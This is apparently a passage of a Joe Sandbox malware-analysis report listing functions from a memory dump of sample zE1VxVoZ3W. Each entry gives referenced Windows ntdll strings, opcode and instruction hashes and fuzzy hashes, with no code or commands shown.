HEAP: , xrefs: 010ABAAD, 010ABAEA
VirtualQuery Failed 0x%p %x, xrefs: 010ABAF7
HEAP[%wZ]: , xrefs: 010ABAA0, 010ABADD
VirtualProtect Failed 0x%p %x, xrefs: 010ABABA

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 164b108c648fa2eaf5ce570db6750f11a01226f6679b079424c49e6e3e40a516
Instruction ID: 7a1a188a198896bde7c1fe85b171a02f4b8de8982136aea88c3717bf9b634f4d
Opcode Fuzzy Hash: 164b108c648fa2eaf5ce570db6750f11a01226f6679b079424c49e6e3e40a516
Instruction Fuzzy Hash: 9B31A076600115EFCB01DB99C884FEABBF8EF55724F1440B9E994AB291D770ED40CA60

Function 0104A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 0104A1C1
\??\, xrefs: 010AC1E4
FilterFullPath, xrefs: 010AC2E6

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: ece5eea1ebb82edea7b459d8492b7886e57d7d6499894752cc5161f6978b11ad
Instruction ID: 7421de24fa9f9ba18dd34ce6ff12a80385c9350e44cb0fe623b6bb3ea495b526
Opcode Fuzzy Hash: ece5eea1ebb82edea7b459d8492b7886e57d7d6499894752cc5161f6978b11ad
Instruction Fuzzy Hash: 51A19B769012299BEF71DF68CD88BEAB7B8EF44700F0141E9E949AB250D7359E84CF50

Function 010D7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

Objects=%4u, xrefs: 010D75EA
Objects>%4u, xrefs: 010D75D5
VirtualAlloc, xrefs: 010D75FC

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: 1775d9a3373163e9a8b0f7713826f369268b27affdb49cd33e187e40a780cbc9
Instruction ID: a09ca9ab074e23718ecad87cb05204a8549e7fcd8f3afae454faf693d923e00c
Opcode Fuzzy Hash: 1775d9a3373163e9a8b0f7713826f369268b27affdb49cd33e187e40a780cbc9
Instruction Fuzzy Hash: 28912BB0E003159FEB58CFA9C480BADBBF1BF48318F14C16AE945AB291E7759842CB54

Function 0105B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Enter, xrefs: 0105B465
{, xrefs: 010B37B6
LdrpResGetResourceDirectory Exit, xrefs: 0105B477

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: 2939972c92f9f8e32f8bf7bd5aae283d9daf73f80cc67b1c98730b091d693e78
Instruction ID: 5128f13971d2dcd7a828acd05dacd21cb0c7cf02d8bf93f99a168fd7cf24ab84
Opcode Fuzzy Hash: 2939972c92f9f8e32f8bf7bd5aae283d9daf73f80cc67b1c98730b091d693e78
Instruction Fuzzy Hash: 0A91B071904219CFDB65CF58C490BEEBBF2FF04354F244195ED91AB290D778AA41CBA0

Function 0108909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01089148
%, xrefs: 010C5D3F
&, xrefs: 010C5CF8

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: c22375a183926285237a7b106b07ff02b27361f4924e99ad13e0b32bfd98061f
Instruction ID: 215aada22ae6edd912c86432a84031b6d773851e05a4a4a0dbf3ed6236ec1684
Opcode Fuzzy Hash: c22375a183926285237a7b106b07ff02b27361f4924e99ad13e0b32bfd98061f
Instruction Fuzzy Hash: 3D719B7060C7069FDB55FF28C980A6FBBE5BFD4618F108A5DE4DA47691C730A805CB52

Function 010715F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrmap.c, xrefs: 010BA59A
LdrpCompleteMapModule, xrefs: 010BA590
Could not validate the crypto signature for DLL %wZ, xrefs: 010BA589

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: ec6c5dcb4f71a49d196677a9af92d0d075562badfec13b2cadd81d923b634b46
Instruction ID: 7e4666c2d64eb09e5ee920397b493b84a798d9a2386c08c65005499bd335785a
Opcode Fuzzy Hash: ec6c5dcb4f71a49d196677a9af92d0d075562badfec13b2cadd81d923b634b46
Instruction Fuzzy Hash: 26513770B00741DBEB22DB5CC984BAA7BE9FF04714F1802A9EAD19B2D2D774EA40C754

Function 0104758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010AAFB8
HEAP[%wZ]: , xrefs: 010AAFAB
Invalid address specified to %s( %p, %p ), xrefs: 010AAFCB

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 4fa333c56e56ebbff9203c0b0a15e085c532183f9d24f4f1343316c366c6d335
Instruction ID: cb80d92d9cccc4b4f5d7d5703a72d36a6e7b50f02d01819f4780d1dacd7b47a6
Opcode Fuzzy Hash: 4fa333c56e56ebbff9203c0b0a15e085c532183f9d24f4f1343316c366c6d335
Instruction Fuzzy Hash: 1E41E3B0300380DFEB6DCADCC4C47B97BE69B0A244F5844B9D5C68B6C6DB68D886CB51

Function 0110C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0110C1C5
@, xrefs: 0110C1F1
PreferredUILanguages, xrefs: 0110C212

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 39c01d2753614bc261265d4c7b0f0aa90fc29d491ce80fe79ad06fdc8e37c356
Instruction ID: 95f548987849517657a63474326222d10324cdc4cb608b485298db5167fbc48f
Opcode Fuzzy Hash: 39c01d2753614bc261265d4c7b0f0aa90fc29d491ce80fe79ad06fdc8e37c356
Instruction Fuzzy Hash: B7416471D00209EBDF16DAD8C891BEEB7B9AB14700F1441AAE645B7680D7B49A448F90

Function 010E4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 010E4172
@, xrefs: 010E4225
LdrpResValidateFilePath Enter, xrefs: 010E4160

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 33470a75b72f1912bc0f81d9687809a448ab56f0272965f4b9e1c1758f024519
Instruction ID: fb9a8c7a9b21dc7ef57d8a812ad11175371ce3c0dcab5312c5f6a1348a712173
Opcode Fuzzy Hash: 33470a75b72f1912bc0f81d9687809a448ab56f0272965f4b9e1c1758f024519
Instruction Fuzzy Hash: 2941E271A002598FEB25DBDAC858BEDBBF8FFA5340F140499DA81EB781D7349901CB50

Function 010833A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

Actx , xrefs: 010833AC
RtlCreateActivationContext, xrefs: 010C29F9
SXS: %s() passed the empty activation context data, xrefs: 010C29FE

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 46e7d8cb7d73d4a61c5cb9e5d556fe9fa3dada6ec43278c34e14bf1fa9da90bc
Instruction ID: 3463de7e26e2662474cab69f3ee624f948fef2ce249defaad28ddf26071feff2
Opcode Fuzzy Hash: 46e7d8cb7d73d4a61c5cb9e5d556fe9fa3dada6ec43278c34e14bf1fa9da90bc
Instruction Fuzzy Hash: 80312636200305DFEB26EF5CC880B9A7BA4FB84B10F154469ED849F291CB71E851CB90

Function 010DB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 010DB670
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 010DB632
GlobalFlag, xrefs: 010DB68F

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: bee681498747cc181e0a70cf90e7d3d2e03dba6c15a6fb7d8897d1bf8438614b
Instruction ID: 03d2427f3121c0666dd7d32c3f3bbfc4ce4853a6b83a54188bb1569cfb51160c
Opcode Fuzzy Hash: bee681498747cc181e0a70cf90e7d3d2e03dba6c15a6fb7d8897d1bf8438614b
Instruction Fuzzy Hash: 24316CB1A0020AAFDF10EF95CC90AEFBBBCEF49744F0504A9EA45A7140D7759E00CBA4

Function 01091270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

BuildLabEx, xrefs: 0109130F
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0109127B
@, xrefs: 010912A5

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 64305bfa84fe5d33700a01299b0611a17995450d90b68b270d1a557d4ee690b6
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 1131A172A0021EBBDF11AF95CC50EDEBBBDEB94764F008025E654A72A0D7309A05AB90

Function 010D20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 010D20F3
LdrpInitializationFailure, xrefs: 010D20FA
minkernel\ntdll\ldrinit.c, xrefs: 010D2104

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 7bb0b76c9e14954609ed32eba7b2006841e14074c33b944aefed477efacbbe44
Instruction ID: 70a97c71574c2822014c30353472527721f997f49c8f8b5951d17b8e8ff222a0
Opcode Fuzzy Hash: 7bb0b76c9e14954609ed32eba7b2006841e14074c33b944aefed477efacbbe44
Instruction Fuzzy Hash: 46F0C279640318ABE724E75DDC42FD93BACEB90F54F1000A9FBD0AB685D6B0A940CA91

Function 010603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 010B4D8A

Strings

#%u, xrefs: 010B4D82

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 39d2b1e455c16cbff9841f5876de3de031cd61f7ef04f98108c9dd482d174c9f
Instruction ID: 4bcbc331d88ff07406a3ca4534ff3064139de4268eeae2a9057386c4c9bbd82c
Opcode Fuzzy Hash: 39d2b1e455c16cbff9841f5876de3de031cd61f7ef04f98108c9dd482d174c9f
Instruction Fuzzy Hash: C9715D71A0014A9FDB15DFA8C990BEEB7F8FF18744F144065E945EB251EA34EE01CBA0

Function 010652A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 01065445
@, xrefs: 010655A3

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 1b72cf72026bfbae2d240d0ae0d4d3cc04daf3dda14ef99c0a09e6f4227bd31b
Instruction ID: b560f7202bccfc63ac594afdd1ecc215e40cb73edf154d65ee016f43c9e85f64
Opcode Fuzzy Hash: 1b72cf72026bfbae2d240d0ae0d4d3cc04daf3dda14ef99c0a09e6f4227bd31b
Instruction Fuzzy Hash: 78329D705083118BDB64CF18C99077EBBE9EF88784F14496EFAD59B290E735D980CB92

Function 0111A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0111A44B
`, xrefs: 0111A551

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 0fea8d3aa519ce3cc8d723bb60565ce72f0213136a792171ba16fd9f13f14c30
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 71C1B0312093829BE729CE28D841B6BFFE5AFC4318F084A3DF6968B294D775D505CB41

Function 0105A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0105A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0105A2FB

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: ecbec935d21afcf0486106db41c2fa7643cdaba7f2e23cf66738bb14e1856879
Instruction ID: 7ea2d831d5aeb9e884be0ace286300fc0365940fde5f55bb51e3d743bbfe5301
Opcode Fuzzy Hash: ecbec935d21afcf0486106db41c2fa7643cdaba7f2e23cf66738bb14e1856879
Instruction Fuzzy Hash: E441BC31B00645DBDB51DF59C880BAE7BF4FF84304F1481A5ED84DB292E6B5EA40CB50

Function 010E35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 010E35EC
LdrResGetRCConfig Exit, xrefs: 010E35FE

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 42d50bb493aae1f7d61130f89fc189646580750a2c9e18af5986f2c783283eb6
Instruction ID: b01af0b855db4d5b510cc86d64b04320a0591abfcd0c2045fe7fa7d2e7af0966
Opcode Fuzzy Hash: 42d50bb493aae1f7d61130f89fc189646580750a2c9e18af5986f2c783283eb6
Instruction Fuzzy Hash: 49318E312087429FD311DB69D858B5ABBE4FF99754F0448A9F9D4CB390EB30D905CB92

Function 0108329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 0108330D
.Local\, xrefs: 010832B5

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 8d94f2c4a13bdf2ad37dcde1a79f49a9f7fe0e4e7f7ce4edd4828a2b6a633250
Instruction ID: 077179708dbd6bf0d49c2bbd17fcb6d6b304cc4b7fe4e717ccf287b6eb6b0a6f
Opcode Fuzzy Hash: 8d94f2c4a13bdf2ad37dcde1a79f49a9f7fe0e4e7f7ce4edd4828a2b6a633250
Instruction Fuzzy Hash: 8C317CB250D305AFC751EF28C880A9FBBE8FBD5A54F44492EF9D58B210DA31DD048B92

Function 0108A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0108A5E9
Cleanup Group, xrefs: 0108A5E4

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: df803da5f5bc5a9667b7a70cfee5b1040eae81e8e5b2cf2b17ec4ef9a33bd356
Instruction ID: 32c6529f52a5601c8f6160b0bb6008bcb1c2825b89aadf92cffa742e61afd4f1
Opcode Fuzzy Hash: df803da5f5bc5a9667b7a70cfee5b1040eae81e8e5b2cf2b17ec4ef9a33bd356
Instruction Fuzzy Hash: 0201D1B2255700EFD311EF14CD45B6677E8E799B29F00893AA6D8CB594E334D814CB4A

Function 01057370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5059c3bc418c830d5447dba67c0fc2e58a8728ecca787c43deb3160b85e55c82
Instruction ID: b14b769e4763f89b41396b4519699da50e15a15b21d467f6eb810a6ccb61bb81
Opcode Fuzzy Hash: 5059c3bc418c830d5447dba67c0fc2e58a8728ecca787c43deb3160b85e55c82
Instruction Fuzzy Hash: 60A18BB1608342CFC365DF28D480A6BBBE5BF98304F50496DE9C587351EB70E945CB92

Function 010D6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 010D65C1

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8ef841030463be20dd2f30ef498d008e9a35c717a7b74e83830ed0a879e7c145
Instruction ID: 902c6b6c2750dbb48ac6703629132cf6a9a3aa715d46f875ecff31cdfd820b9d
Opcode Fuzzy Hash: 8ef841030463be20dd2f30ef498d008e9a35c717a7b74e83830ed0a879e7c145
Instruction Fuzzy Hash: 74917271A00219AFEB21DF95CD85FEEBBB8EF18B50F104065F640AB194D775AD00CBA4

Function 0110B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 0110B28F

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 40ed9da61e6374396e133df3358007d005e9afeae8c789563c69f5f317b48f1d
Instruction ID: 6f686fb8d1951556e72b0cd2f94f2e5d7c9bfef24a935bad24eeef2adbf90d98
Opcode Fuzzy Hash: 40ed9da61e6374396e133df3358007d005e9afeae8c789563c69f5f317b48f1d
Instruction Fuzzy Hash: 2A41E77AD08219ABDF1ADA98C840BEEB7B9EF44710F110126EE41EF290D7B0DD40C7A4

Function 010F705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 010F70A4

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: 12d38614cea94bc9979b3c51a6b9d0564886bbe15edeb904aaf62a9aeb117642
Instruction ID: 2d12162d1a1c9119ae8cec734f023aad971651c2c21f19d66f787c6b6abdad95
Opcode Fuzzy Hash: 12d38614cea94bc9979b3c51a6b9d0564886bbe15edeb904aaf62a9aeb117642
Instruction Fuzzy Hash: A8415A395013528BE779AB68E846BA93FE0BB01F2CF14017DEEE44A5C9C7B444C5C7A2

Function 01087505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 010C4622

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 60248a7b5f093acd25dd26619b1c466673aab1dff672509aaf8f812841807e24
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: 8E41B175A04656DBCF25EF48C890BBEB7B5FF84711F10409AE9C597208DB70D981CBA2

Function 01055096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 010550BF

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 9243495a120f083cee19f8990ee140c9d6548b63959c9e0e42ee4440928ffa96
Instruction ID: dc7d6d47f65b8371a80e37703faa91fc34b39c05f25ca92d850cdbfafcf48bf1
Opcode Fuzzy Hash: 9243495a120f083cee19f8990ee140c9d6548b63959c9e0e42ee4440928ffa96
Instruction Fuzzy Hash: 9C1193307456028BEBE5491D8C5167BBBE9EB82224F34996AFDD2CF391D671DC418384

Function 010D106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 010D10F7

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 0783e3c876d535901e1b109cf26b0894904c386f8ee5f5ec3cb8181d43ff7ada
Instruction ID: 819686bfa5d0324fc41935ca00e8cd067cfa8d2627b7edceb9ac7d0c9c737a02
Opcode Fuzzy Hash: 0783e3c876d535901e1b109cf26b0894904c386f8ee5f5ec3cb8181d43ff7ada
Instruction Fuzzy Hash: A12115B16183449FC320DF6AD844A9BFBE8FBE5B00F004A1EF9A097250DBB0D405CB92

Function 010A739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc29df012f5a948ba3eb5600256566d74bcdbe811d1e77c9479b3edd29ed5392
Instruction ID: 4eef8f8d7b65e8891f737f31239fdd8c9bfcceaf8a03fe0431117ab90fdc9adf
Opcode Fuzzy Hash: fc29df012f5a948ba3eb5600256566d74bcdbe811d1e77c9479b3edd29ed5392
Instruction Fuzzy Hash: 5642B171A006169FDB19CF98C4906BEBBF2FF88314B54C5ADD592AB341DB35E842CB90

Function 0107B2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ee06300698548991688916346db1ca7111c00c7a712b922589f77d0f5c5e032
Instruction ID: 2e57ae799f5b45b41705d209bb7c9dc673b484dfe3e5e34ba65cbc247af0587e
Opcode Fuzzy Hash: 1ee06300698548991688916346db1ca7111c00c7a712b922589f77d0f5c5e032
Instruction Fuzzy Hash: E132AD71E00219DBDF24CFA8C890BEEBBB1FF54714F184069E985AB381E7359951CB94

Function 010E8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10badda9e3c611f81858db9688e54cdf5ab92da5eb248aad7cc149d2fb6dfa43
Instruction ID: 487efdc0b87e132039b13306d6772b3f863015c3afc7f9cca6d3e5ad85079a85
Opcode Fuzzy Hash: 10badda9e3c611f81858db9688e54cdf5ab92da5eb248aad7cc149d2fb6dfa43
Instruction Fuzzy Hash: A4423C75E002198FEB65CF69C845BADBBF5BF88300F14C19AE989EB241DB349985CF50

Function 010FA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd7536d738b8353f39192d950fd3ed5898153d8703a9a28e860a6ac2af0615dc
Instruction ID: 88b2033af6d4b405e8db421870b7a0612e8a91173dcd2f7968170e717f6c651d
Opcode Fuzzy Hash: fd7536d738b8353f39192d950fd3ed5898153d8703a9a28e860a6ac2af0615dc
Instruction Fuzzy Hash: 3B22BF74704651CAEB65CF2DC456776BBF1BF88340F08849DEACA8BA86D735E442CB60

